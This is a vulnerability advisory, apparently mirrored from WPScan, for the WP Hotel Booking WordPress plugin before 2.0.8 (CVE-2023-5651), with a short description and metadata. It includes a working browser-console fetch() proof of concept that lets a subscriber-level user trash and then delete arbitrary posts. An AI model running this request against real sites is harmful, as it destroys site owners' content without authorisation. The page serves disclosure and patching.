Lucene search
Krzysztof Zając (CERT PL)WPVDB-ID:A365C050-96AE-4266-AA87-850EE259EE2CHistoryOct 26, 2023 - 12:00 a.m.
WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion
2023-10-2600:00:00
Krzysztof Zając (CERT PL)
wpscan.com
9
hotel booking
arbitrary deletion
csrf checks
wordpress
Description The plugin does not have authorisation and CSRF checks, as well as does not ensure that the package to be deleted is a package, allowing any authenticated users, such as subscriber to delete arbitrary posts
PoC
Run the below command in the developer console of the web browser while being on the blog as a subscriber user. This will put the post with ID 1 in the trash. Run it again to then delete the post fetch(“/wp-admin/admin-ajax.php”, {“headers”: {“content-type”: “application/x-www-form-urlencoded; charset=UTF-8”},“body”: ‘action=tp_extra_package_remove&package;_id=1’,“method”: “POST”});
Related
wpexploit
wpexploit
WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion
2023-10-26 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-11-20 19:15:00
cvelist
cvelist
CVE-2023-5651 WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion
2023-11-20 18:55:08
cve
cve
CVE-2023-5651
2023-11-20 19:15:09
nvd
nvd
CVE-2023-5651
2023-11-20 19:15:09
AI Score
7.1
Confidence
High
EPSS
0
Percentile
13.3%
Related for WPVDB-ID:A365C050-96AE-4266-AA87-850EE259EE2C